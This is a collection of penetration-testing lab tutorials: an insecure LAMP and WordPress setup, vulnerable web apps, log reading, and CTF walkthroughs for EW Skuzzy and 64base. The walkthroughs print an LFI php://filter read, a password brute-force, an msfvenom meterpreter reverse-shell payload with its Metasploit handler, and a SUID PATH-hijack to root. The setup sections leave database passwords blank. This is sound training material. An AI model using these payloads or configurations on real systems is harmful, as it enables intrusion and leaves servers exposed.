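The same grouping logic works on a real capture once you export the relevant columns (ip.src, tcp.srcport, ip.dst, tcp.dstport, tcp.flags) from Wireshark and format them as the lines above expect.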

Configure Penetration Testing Lab Setup in Ubuntu

Hello friends! Today you will learn how to configure your own web server using Ubuntu inside a virtual machine and install the LAMP services needed for a web server configuration.
Let's Begin!!
We are using VMware Workstation 12 Pro for the Ubuntu installation; now follow the guidance step by step.

Choose Typical (the 1st option) for the configuration and click Next.

Since I have already downloaded the 64-bit Ubuntu 14.04 ISO to my Windows system, browse to it as shown in the given image.
Click on next.


Now enter the information to personalize Linux in the text fields:
Full name: pentestlab
Username: raj
Passwords: 123
Confirm: 123
Then click on next.

Specify disk capacity according to your desire as 20 GB I had specified.
Choose split virtual disk into multiple file and then click on next.

Now make some changes to the settings through Customize Hardware before you click Finish.


Change the network adapter setting to Bridged and tick the check box "Replicate physical network connection state".
Then click on close then Finish.
This will create a new virtual machine inside your VM workstation.

Now wait a short time; it will boot automatically and then start the installation, which will take some time.

Now enter the password to log in.


Now we need to install the LAMP services, a collection of open-source software used to get a web server up and running. LAMP stands for Linux, Apache, MySQL and PHP.
The user must have root privileges for the installation; type the following commands in a terminal to begin.
sudo bash
apt-get update


Apache HTTP Server is cross-platform, built for Unix-like systems as well as Windows, and has played a key role in the World Wide Web.
apt-get install apache2

MySQL is the world's most popular open-source database. It is simple to set up and easy to use.

apt-get install mysql-server


You will get a prompt; press Enter to leave the MySQL root password blank (acceptable only because this lab stays on an isolated network).


Again press enter

phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the web. It supports a wide range of operations on MySQL.

apt-get install phpmyadmin


Choose the apache2 web server, which will be automatically configured to run phpMyAdmin.


Again a prompt will open asking for a password for phpMyAdmin to register with the database server.
Press Enter to leave the phpMyAdmin password blank.


Now, in order to configure phpMyAdmin under Apache, you need to include its Apache configuration at the end of /etc/apache2/apache2.conf. Type the following commands to open apache2.conf:

cd /etc/apache2

gedit apache2.conf


Once the file opens, type the following text at the end of it, as shown in the given image (the Include must point at phpMyAdmin's own Apache snippet; including apache2.conf from within itself would be recursive and Apache would not start):
# phpMyAdmin Configuration
Include /etc/phpmyadmin/apache.conf


After editing save the file.

Since we left the phpMyAdmin password blank, we need to change its configuration file config.inc.php so that it allows logging in to the database with no password.
Type the following command to open config.inc.php:

gedit /etc/phpmyadmin/config.inc.php


Focus on the highlighted line and remove the leading double slash (//) to uncomment it.


Now you can observe that the given image highlights the following line:

$cfg['Servers'][$i]['AllowNoPassword'] = TRUE;


Now open phpMyAdmin in the browser at localhost/phpmyadmin, as shown in the image.
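The two hand edits above are easy to get wrong (a self-referencing Include, a duplicated Include after a second attempt, or the AllowNoPassword line left commented), so as an added example (not code from the original article) here is a small checker and fixer for both files that works on their text. The sample file contents are constructed for the example, with the apache2.conf deliberately carrying the recursive Include mistake; the real files on your VM are the two paths named above.

```python
"""Check and fix the two hand edits made above to apache2.conf and phpMyAdmin's config.inc.php."""
import re

PMA_INCLUDE = "Include /etc/phpmyadmin/apache.conf"
# Matches the AllowNoPassword line, commented out (group 1 set) or live (group 1 None).
ALLOW_NO_PW = re.compile(
    r"^[ \t]*(//[ \t]*)?(\$cfg\['Servers'\]\[\$i\]\['AllowNoPassword'\][ \t]*=[ \t]*TRUE[ \t]*;)",
    re.M | re.I,
)


def audit_apache_conf(text: str, path: str = "/etc/apache2/apache2.conf"):
    """Return a list of problems with the Include lines of apache2.conf (empty when fine)."""
    problems = []
    includes = [l.strip() for l in text.splitlines() if l.strip().lower().startswith("include")]
    if f"Include {path}" in includes:
        problems.append(f"{path} includes itself (recursive Include)")
    count = includes.count(PMA_INCLUDE)
    if count == 0:
        problems.append("phpMyAdmin include missing")
    elif count > 1:
        problems.append("phpMyAdmin include duplicated")
    return problems


def fix_apache_conf(text: str, path: str = "/etc/apache2/apache2.conf") -> str:
    """Turn a self-include into the intended line, drop duplicates, append the include if absent."""
    out = []
    for line in text.splitlines():
        if line.strip() == f"Include {path}":
            line = PMA_INCLUDE
        if line.strip() == PMA_INCLUDE and PMA_INCLUDE in (x.strip() for x in out):
            continue
        out.append(line)
    if PMA_INCLUDE not in (x.strip() for x in out):
        out += ["", "# phpMyAdmin Configuration", PMA_INCLUDE]
    return "\n".join(out) + "\n"


def audit_pma_config(text: str):
    """Return problems with the AllowNoPassword setting in config.inc.php (empty when enabled)."""
    m = ALLOW_NO_PW.search(text)
    if m is None:
        return ["AllowNoPassword line not present"]
    if m.group(1):
        return ["AllowNoPassword still commented out"]
    return []


def fix_pma_config(text: str) -> str:
    """Uncomment the AllowNoPassword line; only sensible on an isolated lab network."""
    return ALLOW_NO_PW.sub(r"\2", text, count=1)


# Constructed sample files (not copied from a real install): the apache2.conf carries the
# recursive-Include mistake, and the phpMyAdmin config still has the line commented out.
SAMPLE_APACHE_CONF = (
    "# This is the main Apache server configuration file.\n"
    "ServerRoot \"/etc/apache2\"\n"
    "IncludeOptional conf-enabled/*.conf\n"
    "# phpMyAdmin Configuration\n"
    "Include /etc/apache2/apache2.conf\n"
)
SAMPLE_PMA_CONF = (
    "<?php\n"
    "$i++;\n"
    "// $cfg['Servers'][$i]['AllowNoPassword'] = TRUE;\n"
)

if __name__ == "__main__":
    print("before:", audit_apache_conf(SAMPLE_APACHE_CONF), audit_pma_config(SAMPLE_PMA_CONF))
    print("after: ", audit_apache_conf(fix_apache_conf(SAMPLE_APACHE_CONF)),
          audit_pma_config(fix_pma_config(SAMPLE_PMA_CONF)))
```

To apply it to the VM, read each file, pass its text through the fix function and write it back, then run apachectl configtest before restarting Apache.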


Install the PHP 5 module for Apache 2 and all of its dependencies.
apt-get install php5 libapache2-mod-php5

Having installed the LAMP services inside Ubuntu, it now operates as a web server.


Now install some other useful services for sharing data between server and client.
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. It runs over TCP on port 22 to establish communication between server and client.
apt-get install openssh-server


Install the vsftpd service, the default FTP server in Ubuntu; it also uses TCP, listening on port 21 for the control connection.
apt-get install vsftpd


To ensure the above services have been installed properly, use nmap, which will scan your system and report the open ports and running services.
To run nmap, first install it with the following command:
apt-get install nmap


Now scan your system with nmap to confirm the running services:
nmap 127.0.0.1
From the given image you can see the result listing the running services on my system.

Hack the EW Skuzzy VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge, known as EW Skuzzy. The credit for making this VM goes to "vortexau", and it is another capture-the-flag machine where the author has hidden flags for the attacker as a challenge. You can download this VM here.
Let’s Breach!!!

The target holds 192.168.1.112 as its IP; now let's find the open ports using nmap.

nmap -sV 192.168.1.112


From the given image you can see that port 22 (SSH), 80 (HTTP) and 3260 (iSCSI) are open on the target.

We tried SSH but found no clue, so we opened this IP in the browser.

We spent some time on this site; after running dirb and nikto we found only some troll flags.
So we move on to port 3260, which runs iSCSI. iSCSI stands for Internet Small Computer Systems Interface; it is used to link data storage facilities over a network, and here the export accepts logins without any credentials, so anyone on the network can attach the disk.

You can check which targets are available with the iscsiadm utility. Enter the following in a terminal:

iscsiadm -m discovery -t st -p 192.168.1.112

Then we log in to the discovered target:

iscsiadm -m node --login


Now we check whether the disk is available:

fdisk -l


We see that one new disk, /dev/sdb, is available. Now we mount it to access it.

mount /dev/sdb /root/Desktop/raj


After mounting the storage device we move into the storage and check the content of the storage.


We find our 1st flag; we also found a disk image inside the storage, which we now mount as well to check its contents.

Inside the image we found an email file, ToAlice.eml, and an encrypted file, ToAlice.csv.enc. We open the eml file and find our 2nd flag.
From the eml file we also learn that the csv was encrypted with OpenSSL using 256-bit AES.


Decrypting the file requires a password, so first we brute-force the password of the OpenSSL-encrypted file (AES-256-CBC with SHA-256 key derivation):
bruteforce-salted-openssl -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 -c AES-256-CBC ToAlice.csv.enc


We now have the password "supercalifragilisticoespialdoso". We use openssl to decrypt the file:
openssl enc -d -aes256 -md sha256 -salt -in ToAlice.csv.enc -out ToAlice.csv -k supercalifragilisticoespialdoso


We find the 3rd flag, along with some random-looking strings. We first tried to decode them, but they were not encoded at all: they turned out to be page names.
We open them in the browser; the first page contains nothing significant, just some trolling.


The second page contains some content that looks useful.


After playing around with the site we find our hint and move to the feed reader.


We open the load feed link.


Here we find a hint that a PHP file is hiding something, so we use dirb to find all the PHP files inside this folder.
dirb http://192.168.1.112/c2444910794e037ebd8aaf257178c90b/ -X .php



Now we have all the PHP files in the folder. Opening them gives us another hint. Looking at the URL, it seems that RFI (remote file inclusion) may be possible on this site.


When we try RFI, it says an authentication key is required.


So we fall back to LFI and read the PHP files with curl. Requesting a PHP file directly would execute it, so we wrap the path in php://filter/convert.base64-encode/resource=..., which makes PHP return the file's source base64-encoded instead of running it.


Scrolling down, we find the base64-encoded source.


After decoding it we find the 4th flag.
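The php://filter step above, as an added example that is not code from the original walkthrough: it builds the LFI URL, explains why the base64 filter is needed, and pulls the source back out of a page body. Assumptions: the vulnerable include parameter is called page, and the response body used here is constructed, not captured from the VM.

```python
# Added example; not code from the original walkthrough. It shows why the
# php://filter wrapper is used with an LFI and how to pull the source out of
# the response. Assumptions: the include parameter is named "page", and the
# response body below is constructed here, not captured from the VM.
import base64
import binascii
import re


def filter_url(base, param, resource):
    """Build the LFI URL. Including a .php file directly makes PHP execute it;
    convert.base64-encode makes PHP emit the file's bytes as base64, so the
    <?php ... ?> source (keys, flags, logic) reaches us unexecuted."""
    return f"{base}?{param}=php://filter/convert.base64-encode/resource={resource}"


# A base64 blob is a long run of base64 characters, optionally '='-padded.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_source(body):
    """Find the longest base64 run in a page body (the rest is the page's own
    HTML), decode it and return the source as text, or None if nothing decodes."""
    best = None
    for match in B64_RUN.finditer(body):
        try:
            blob = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # a word that merely looks like base64
        if best is None or len(blob) > len(best):
            best = blob
    return best.decode("utf-8", "replace") if best else None


# Single- and double-quoted PHP string literals: hard-coded keys live here.
PHP_STRING = re.compile("'([^']*)'" + '|"([^"]*)"')


def php_string_literals(source):
    """Return the string literals found in PHP source, in order."""
    return [sq or dq for sq, dq in PHP_STRING.findall(source)]


# Constructed stand-in for what the server would return for reader.php.
SAMPLE_PHP = (
    "<?php\n"
    '$key = "example-key-not-from-the-vm";\n'
    'if (!isset($_GET["key"]) || $_GET["key"] !== $key) { die("auth required"); }\n'
    "?>\n"
)
SAMPLE_BODY = (
    "<html><body>" + base64.b64encode(SAMPLE_PHP.encode()).decode() + "</body></html>"
)

if __name__ == "__main__":
    print(filter_url("http://192.168.1.112/c2444910794e037ebd8aaf257178c90b/", "page", "reader.php"))
    source = extract_source(SAMPLE_BODY)
    print(source)
    print(php_string_literals(source))
```

The same helper works for any LFI where the include is handled by PHP: fetch the URL returned by filter_url with curl, feed the body to extract_source, and scan the literals for the key the page wants.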


Now we open the other PHP files. Going through them we find the next hint in “reader.php”, which we also read through the LFI.


Again we find a base64 string inside the file.


Decoding the string gives PHP code, and in it our next hint: the key is 47 characters long. Going through our notes, flag4 is exactly 47 characters long, so we use it as the key, and it works.


Now we create a PHP meterpreter payload with msfvenom and save it as a text file:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4444 > /root/Desktop/ra.txt


After creating the file we edit it, replacing the marker with ##php## as shown in the image.


Then we use the RFI to include our file and get a meterpreter session, appending the key at the end of the URL.


We start the listener in metasploit:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.120
set lport 4444
exploit

Using the RFI we execute the payload and get a meterpreter session; then we drop to a shell and upgrade it to a proper TTY with Python's pty module:
meterpreter > sysinfo
meterpreter > shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Then we look for SUID binaries on the system (files that run with their owner's privileges, often root):
find / -perm -4000 2>/dev/null


We find /opt/alicebackup. Running it (and looking at its strings) shows that it calls the id command without an absolute path, so id is resolved through PATH at run time. We exploit that by placing our own id in a writable directory and putting that directory first in PATH:
cp /bin/sh /tmp/id
export PATH=/tmp:$PATH
/opt/alicebackup


Because /tmp is now searched first, alicebackup executes our copy of /bin/sh with its root privileges and we get a root shell. From there we move into /root and find the final flag.
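The PATH hijack used against /opt/alicebackup, as an added example that is not code from the original walkthrough. It shows the lookup that a SUID program triggers when it runs id by bare name, gives a check that lists the directories an attacker could plant a fake binary in, and shows that an absolute path sidesteps PATH entirely. Everything is built inside a temporary directory: a sub-directory named sbin stands in for /usr/bin and one named writable stands in for /tmp; the two id scripts are constructed stand-ins.

```python
# Added example; not code from the original walkthrough. It demonstrates why a
# SUID program that runs `id` without an absolute path can be hijacked through
# PATH, provides a check for it, and shows the fix. Everything lives in a
# temporary directory: "sbin" stands in for /usr/bin, "writable" for /tmp.
import os
import shutil
import tempfile

FAKE_ID = "#!/bin/sh\nexec /bin/sh\n"  # what `cp /bin/sh /tmp/id` achieves


def hijackable_dirs(cmd, path):
    """Directories that are searched for `cmd` before the real binary and that
    we can write to. Each one is a place where a fake `cmd` wins the lookup."""
    weak = []
    for d in path.split(os.pathsep):
        if os.access(os.path.join(d, cmd), os.X_OK):
            break  # real binary found here; later directories never matter
        if os.path.isdir(d) and os.access(d, os.W_OK):
            weak.append(d)
    return weak


def resolve(cmd, path):
    """First match in PATH order: what system("id") ends up running.
    An absolute cmd is returned as-is, so PATH is never consulted."""
    return shutil.which(cmd, path=path)


def demo():
    """Return the resolution of `id` before and after the hijack."""
    with tempfile.TemporaryDirectory() as root:
        sbin = os.path.join(root, "sbin")          # plays /usr/bin
        writable = os.path.join(root, "writable")  # plays /tmp
        os.makedirs(sbin)
        os.makedirs(writable)

        real = os.path.join(sbin, "id")            # stand-in for the real id
        with open(real, "w") as f:
            f.write("#!/bin/sh\necho uid=0(root)\n")
        os.chmod(real, 0o755)

        clean_path = sbin
        attacker_path = writable + os.pathsep + sbin   # export PATH=/tmp:$PATH
        weak = hijackable_dirs("id", attacker_path)    # check before planting

        fake = os.path.join(writable, "id")            # cp /bin/sh /tmp/id
        with open(fake, "w") as f:
            f.write(FAKE_ID)
        os.chmod(fake, 0o755)

        return {
            "weak_dirs": weak,
            "clean": resolve("id", clean_path),        # what root intended
            "hijacked": resolve("id", attacker_path),  # what alicebackup runs
            "fixed": resolve(real, attacker_path),     # absolute path ignores PATH
            "real": real,
            "fake": fake,
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:10} {v}")
```

The fix on the program's side is either to call /usr/bin/id by absolute path or to reset PATH to a trusted value before any exec; on the audit side, hijackable_dirs run against a SUID binary's effective PATH tells you whether the bug is reachable.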

Configure Web Application Pentest Lab

In our previous article you learnt how to configure a web server on an Ubuntu system with the LAMP stack for designing your own pentest lab. Today you will learn how to configure four well-known vulnerable web applications (DVWA, bWAPP, SQLI-labs and Mutillidae) inside that web server for web application penetration testing (WAPT) practice.

Let’s Begin!!

Open the terminal, switch to the root user and move into the html directory with the following commands:
sudo bash
cd /var/www/html
To reach these applications through localhost in the browser, download and configure them inside this html directory (Apache's document root).


DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, and to help web developers better understand the process of securing web applications.

Download dvwa inside html using following command.

wget https://github.com/ethicalhack3r/DVWA/archive/master.zip


Now type the following commands step by step to configure DVWA.

ls
From the given image you can see we have downloaded master.zip; now unzip it with the command below.
unzip master.zip


After unzipping, rename the DVWA-master directory to dvwa and move into it:
ls
mv DVWA-master dvwa
ls
cd dvwa
ls



Then move inside config and rename config.inc.php.dist to config.inc.php:
cd config/
ls
mv config.inc.php.dist config.inc.php


gedit config.inc.php
Open config.inc.php with the command above. You will see that db_password is set to p@ssw0rd. Replace it with an empty string, because the MySQL root account in our lab (set up in the previous article) has a blank password. If your MySQL root account has a password, or uses the auth_socket plugin as newer Ubuntu releases do, put the matching credentials here instead or the setup page will fail to connect.


After blanking the password, save config.inc.php


Now open the application in the browser through URL: localhost/dvwa/setup.php
As shown in the image a setup page opens; click the Create / Reset Database button.


Log in to the application through URL: localhost/dvwa/login.php
The default username and password are admin and password respectively.


With the steps above you have DVWA configured in your web server and can practise web penetration testing on the vulnerabilities it provides.


bWAPP
bWAPP, or buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares you to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Now download bWAPP and unzip the archive, then move the bwapp folder from the download directory into html:
cd /var/www/html
mv /home/raj/downloads/bwapp_latest/bwapp .
ls
Now you can see bwapp inside the html directory.


Now make the following change inside the file “settings.php” for its configuration.
cd admin
ls
gedit settings.php


Here, as for DVWA, remove the password “bug” from db_password.


Leave db_password blank and save the file.

Now browse to the application through URL: localhost/bwapp/install.php
As shown in the image an installation page opens; click the link “click here to install bWAPP”. After that bWAPP is installed and ready for penetration testing.


Now use the default username and password bee / bug to log in to bWAPP and start practising.

SQLI
SQLI-labs is a set of labs for testing error-based, boolean-based blind and time-based SQL injection.
cd /var/www/html
Download SQLI-labs (by Dhakkan) inside the html directory with git, then rename the directory to sqli:
git clone https://github.com/Audi-1/sqli-labs.git
mv sqli-labs sqli


Now open the application in the browser through URL: localhost/sqli and click “Setup/reset Database for labs”.

This creates the database for the labs; after that they are ready for SQL injection practice. The labs are designed mainly around SQL injection, and each lesson is built on a different injection scenario.



OWASP Mutillidae II Web Pen-Test Practice Application

OWASP Mutillidae II is a free, open source, deliberately vulnerable web application providing a target for web-security enthusiasts. Mutillidae can be installed on Linux and Windows using LAMP, WAMP and XAMPP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2 and OWASP BWA, and the existing version can be updated on those platforms. With dozens of vulnerabilities and hints to help the user, it is an easy-to-use web hacking environment designed for labs, security enthusiasts, classrooms, CTFs and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web security training courses and as an “assess the assessor” target for vulnerability assessment software.

Download Mutillidae, then move it from the Downloads directory into /var/www/html with the following commands:
cd /var/www/html
mv /home/raj/Downloads/mutillidae .


This application does not require extra configuration, since it ships configured for a MySQL root account with a blank password, which is what this lab uses. Open it directly in the browser through URL: localhost/mutillidae
Now use your pentesting skills to exploit its vulnerabilities.

Wordpress Penetration Testing Lab in Ubuntu

Today we are demonstrating how to install and configure WordPress for penetration testing inside the web server. To configure WordPress you need a web host stack such as XAMPP/WAMP, or you can read our previous article “Configure Web Server for Penetration Testing (Beginner Guide)”, which helps you set up your own localhost web server. Here we are using our own web server, configured on Ubuntu 14.04.

WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. It is installed on a web server that is either part of an Internet hosting service or a network host in its own right. WordPress is reportedly the most popular website management or blogging system on the Web, supporting more than 60 million websites.


Let’s start!!

If you read our previous article you may remember that we set a blank password for the MySQL root user. Start by logging in to phpMyAdmin as root.


phpMyAdmin is split into two panels. The left panel lists the existing databases and the right panel holds the functions for maintenance operations on tables, backing up data, editing things and creating or deleting databases.

To store the WordPress data we need a new database. Click the Databases tab at the top of the right panel.


Enter the database name, here wordpress, and click Create. A new database “wordpress” then appears in the left panel.


Open the terminal and type the following command to download WordPress inside /var/www/html:
wget https://wordpress.org/latest.zip


Now unzip latest.zip:
unzip latest.zip
ls
From the given image you can see the wordpress folder inside the html directory.


For the WordPress installation open it in the browser through URL: http://localhost/wordpress as shown in the image. At the bottom of the page click Let's go! to proceed.


On the next page enter your database connection information:
Database Name: wordpress
Username: root
Password: (blank)
Database host: localhost
Now click Submit.


The next page shows a block of PHP for the wp-config.php file, as in the image; WordPress shows this when it cannot write the file itself. Copy the highlighted text into a text document, then come back and click Run the install.


As you can see we have pasted the copied text into a text file and saved it as wp-config.php on the desktop.


Since wp-config.php is on the desktop, we move it into /var/www/html/wordpress with the following command (run from inside that directory):
mv /home/raj/Desktop/wp-config.php .

Then go back to the open tab and click Run the install.


A “Welcome” page comes up; fill in the information below and you are on your way to the WordPress installation.
Site title: Pentest Lab
Username: admin
Password: password
Email: (your email ID)

Finally click the Install WordPress button at the bottom of the page.


Once WordPress is installed, click Log In as shown in the image.


Enter your WordPress credentials to log in.


Great!! Our site “Pentest Lab” is now online on the localhost server and ready for posts and articles.
Next we add some plugins to WordPress so that we can practise WordPress penetration testing against plugin vulnerabilities. WordPress' plugin architecture lets users extend the features and functionality of a site or blog.


Now hand ownership of everything under /var/www/html to the web server user www-data, so that WordPress can write to its own directory when installing plugins. This is fine for a lab; on a production host the web server should not own the whole document root.
sudo chown -R www-data /var/www/html


For penetration testing practice we download some vulnerable plugins so that we have our own vulnerable WordPress site.
We downloaded the vulnerable plugin behind “Reflex Gallery 3.1.3 arbitrary file upload” from exploit-db.com; you can find many other vulnerable plugins in the exploit database.


Now log in to WordPress as admin to reach the administration panel, select Plugins from the dashboard and go to Add New so that you can add the downloaded plugin.


Click Upload Plugin, browse to the downloaded zip file and install it.


Once installed, click Activate Plugin as shown in the image.


Similarly you can install as many vulnerable plugins as you like. You can see we installed several in our WordPress so that we get more practice in WordPress penetration testing, which you will learn in our next article.
Wait for our next article, where you will learn how to exploit WordPress plugin vulnerabilities.


Hack the 64base VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge, known as 64base. The credit for making this VM goes to “3mrgnc3”; it is another capture-the-flag machine in which the author has hidden flags for the attacker to find. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.1.118, but you will have to find your own):

netdiscover


Use nmap for port enumeration, scanning all ports this time since services may hide on high ports:
nmap -p- -sV 192.168.1.118


We find that port 80 is open, so let's open the IP in the browser.


Taking a closer look at the source code, we find a long encoded string in a comment.


It is hex-encoded; decoding it gives a base64 string, and decoding that gives our 1st flag.




Now we look around the site. The first post gives a hint; using cewl we build a wordlist from the page and, brute-forcing directories with it, find that Imperial-Class exists.


Opening the link prompts for a username and password; we use the credentials found earlier to log in. The page then shows a hint, so we look at its source code.


Inside the source code we find another hint for a link.


Opening this link gives a login page. Its source shows that the form is handled by login.php, so we take a look at that page.


Here we find several hex-encoded strings. Decoded individually they are fragments of one longer string, so we join them in page order and decode the result.


The joined string is hex; decoding it gives base64, and decoding that gives our 2nd flag. Inside the flag is another base64 string, which decodes to a link to a YouTube video.


The video hints that we should use Burp Suite, so we start it and capture the login request.


We send the captured request to Repeater; the response contains the 3rd flag, and inside the flag is a base64 string.


Decoding it gives a link.


We find nothing here, until we remember the hint from the first page.


So we replace exec with system in the request and try to run our command.


Here we find our 4th flag, which contains a base64 string. Decoding it gives a username and password, which we now use for SSH. After a few failed logins I base64-encoded the password again, and that worked.


Now we log in over SSH; from the nmap scan we know OpenSSH is listening on port 62964.


Now that we are inside the shell, we list the files in the current directory.


We open the file and get a random message; after trying a few commands it seems the usual commands have been replaced. So we check what PATH points to:
echo $PATH/*


We find that the command path has been changed. There is a command called droids; we run it to see what it does.


It shows a matrix-style screen, and on closing it we get the message in the image above. Earlier we could not change directory; after running the command we can.
Going through the files we find a hint in /var/www/html/admin. There is a folder called S3cR37/; inside it we find our 5th flag.


Inside flag5 is a base64 string that decodes to a hint.


cat does not work here, so we use strings to dump the printable strings in the file.


We find a hex-encoded string; we copy it to a file on our local system and decode it, which gives an RSA private key.


SSH refuses private keys that other users can read, so we restrict the permissions first:
chmod 600 rsa_key
Then we connect as root with this key on the port found earlier:
ssh -p 62964 -i rsa_key root@192.168.1.118
When we try to log in it asks for a passphrase. After a lot of searching we copy the flag5 file to our system for a closer look:
scp -P 62964 64base@172.16.0.19:/var/www/html/admin/S3cR37/flag5* /root/Desktop/flag5.jpeg


Opening the file on the local system, we find another hint: use the force.


After trying some passphrases we find that the passphrase is usetheforce.

Now we can log in over SSH.


We find the final flag. Inside it is a hex string; decoding it gives base64, decoding that gives hex again, and decoding that gives base64 once more. The last decode finally gives a message that looks like a command.
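The repeated peeling of hex and base64 layers, used above for the fragments in login.php and again for the final flag, as an added example that is not code from the original walkthrough. The fragments, plaintext and wrap() helper below are constructed for the demonstration; none of it is the VM's data.

```python
# Added example; not code from the original walkthrough. It automates the
# nested hex -> base64 -> hex -> base64 peeling done for login.php and for the
# final flag, and the joining of the hex fragments scattered through login.php.
# The fragments and plaintext below are constructed; they are not the VM's data.
import base64
import binascii
import re
import string

HEX = re.compile(r"^[0-9a-fA-F]+$")
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable)


def join_fragments(fragments):
    """login.php split one hex string across several comments; strip each
    piece and join them in page order before decoding."""
    return "".join(f.strip() for f in fragments)


def peel(data, max_layers=10):
    """Repeatedly hex- or base64-decode until the result no longer looks
    encoded. Returns (plaintext, layers_removed). Hex is tried first because
    every hex string is also valid base64; stop when a decode is not printable,
    which means the previous layer was already the real content."""
    cur, layers = data.strip(), []
    for _ in range(max_layers):
        if HEX.match(cur) and len(cur) % 2 == 0:
            raw, name = binascii.unhexlify(cur), "hex"
        elif B64.match(cur) and len(cur) % 4 == 0:
            raw, name = base64.b64decode(cur, validate=True), "base64"
        else:
            break
        text = raw.decode("ascii", "replace")
        if not set(text) <= PRINTABLE:
            break  # binary result: we went one layer too far
        cur, layers = text, layers + [name]
    return cur, layers


def wrap(plain, layers):
    """Inverse of peel, used to build test data: apply layers innermost first."""
    cur = plain.encode()
    for name in layers:
        cur = binascii.hexlify(cur) if name == "hex" else base64.b64encode(cur)
    return cur.decode()


MESSAGE = "constructed plaintext: not the VM's real flag"

if __name__ == "__main__":
    blob = wrap(MESSAGE, ["base64", "hex", "base64", "hex"])
    print(peel(blob))
    print(peel(join_fragments([blob[:10], " " + blob[10:25] + "\n", blob[25:]])))
```

A word such as deadbeef is valid hex but decodes to unprintable bytes, so peel() leaves it alone; a plain word whose length is not a multiple of 4, such as usetheforce, is never mistaken for base64.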


Running this command on the VM gives a congratulations message: we have completed the CTF.


Understanding Log Analysis of Web Server

Logs
Log files are a standard tool for developers and administrators. They record the W5 of a system: what happened, when, by whom, where and why. This information records faults and helps diagnose them.

Log Format
The Common Log Format, also known as the NCSA Common log format, is the standard layout of a web server access log. Each line has the following space-separated fields:
host ident authuser [date] "request" status bytes

Example

127.0.0.1 user-identifier raj [30/Aug/2017:10:25:16 -0700] "GET /apache_pb.gif HTTP/1.0" 200 1068

1. A "-" in a field indicates missing data.
2. 127.0.0.1 is the IP address of the client (remote host) that made the request to the server.
3. user-identifier is the RFC 1413 identity of the client (almost always "-", since ident is rarely deployed).
4. raj is the user id of the person requesting the document, as established by HTTP authentication.
5. [30/Aug/2017:10:25:16 -0700] is the date, time and time zone at which the request was received.
6. "GET /apache_pb.gif HTTP/1.0" is the request line from the client: method, resource and protocol version.
7. 200 is the HTTP status code returned to the client: 2xx is a successful response, 3xx a redirection, 4xx a client error and 5xx a server error.
8. 1068 is the size of the object returned to the client, in bytes, not counting headers.

Importance of log analysis
Logs play an important role in tracking each client's activity and its communication with other computers and networks. A network or system administrator analyses logs to keep an eye on the network for attacks that try to reach sensitive information. From the logs you may be able to identify who introduced a risk and help that person take better precautions.

Location of log files

On Linux or UNIX systems logs are generally created under the /var/log directory. Here you will find important log files and directories such as apache2, auth.log, mysql, kern.log, bootstrap.log, dmesg, apt and so on.


Some Important Types of Logs
Application log
The application log contains events logged by applications or programs. For example, a database program might record a file error in the application log.
Apache: /var/log/apache2 (Debian and Ubuntu; /var/log/httpd on Red Hat-based systems)
Samba: /var/log/samba
Mail: /var/log/mail.log
MySQL: /var/log/mysql

As an example, let's consider the Apache log files. The Apache HTTP server keeps two kinds of log files:

·         Apache Access Log File
Apache records every incoming request it processes in the access log: /var/log/apache2/access.log

·         Apache Error Log File
Errors found while serving requests are logged to the error log: /var/log/apache2/error.log



Now open the apache2 log directory with the following commands in a terminal:
cd /var/log/apache2
ls
You can see all the apache2 log files as shown in the image.
echo > access.log
With the echo command I emptied access.log, so that only the log lines for our current activity remain. Do this only in a lab: emptying a log destroys evidence, and echo leaves one blank line in the file (: > access.log truncates it cleanly).


As described above, apache2 logs client activity from the browser. I opened some web applications, dvwa, bwapp and the wordpress site, in that order, and their log lines appear in apache2's access.log in the same order.


There are many commands and tools for log analysis; here we use just three command-line utilities, cat, head and tail, to read the logs.

In the image you can see we used cat to read the log, which begins with dvwa's entries and ends with wordpress's.

cat is the standard UNIX utility for printing a file's contents; with it you can view the whole of any log file.
Syntax: cat [options] filename
cat access.log


head is a program on UNIX and Unix-like systems that displays the beginning of a text file.
Syntax: head [options] filename
head access.log
By default head prints the first 10 lines of its input to standard output; use the -n option for a specific number of lines, for example: head -n 30 filename.


tail is a program on UNIX and Unix-like systems that displays the end of a text file.
Syntax: tail [options] filename
tail access.log
From the image you can see it shows the wordpress log lines at the end of the file.


Significant ways of reading logs

Since tail reads the last lines of a log file, which hold the most recent client activity, we use tail's options to read logs in a targeted way.
By default tail outputs the last 10 lines of its input; use -n for a specific number of lines, for example: tail -n 30 filename.

tail -n 2 access.log

From the image you can see the command read only the two most recent log lines.


To read multiple log files at once, type:

tail -n 2 access.log error.log

From the image you can see two lines for each file, the access log and the error log.


Now filter with grep on top of tail for specific log records.
Syntax: tail [options] filename | grep "string" [options]

tail access.log | grep 200

In the image the lines containing the string 200 are highlighted. For an administrator this cuts the effort of log analysis, because he or she can read just the requests to which the server answered successfully. Note that grep matches the string anywhere on the line, so a URL or byte count containing 200 also matches; to match only the status field, anchor the pattern on its position, for example grep '" 200 '.


When the server cannot satisfy a request it answers with the 404 “Not Found” error.


tail access.log | grep 404

In the image the log lines containing 404 are highlighted.


As you know, we browsed dvwa, bwapp and wordpress in that order, so their log lines appear in the same sequence: dvwa at the top, bwapp in the middle and wordpress at the end of access.log.
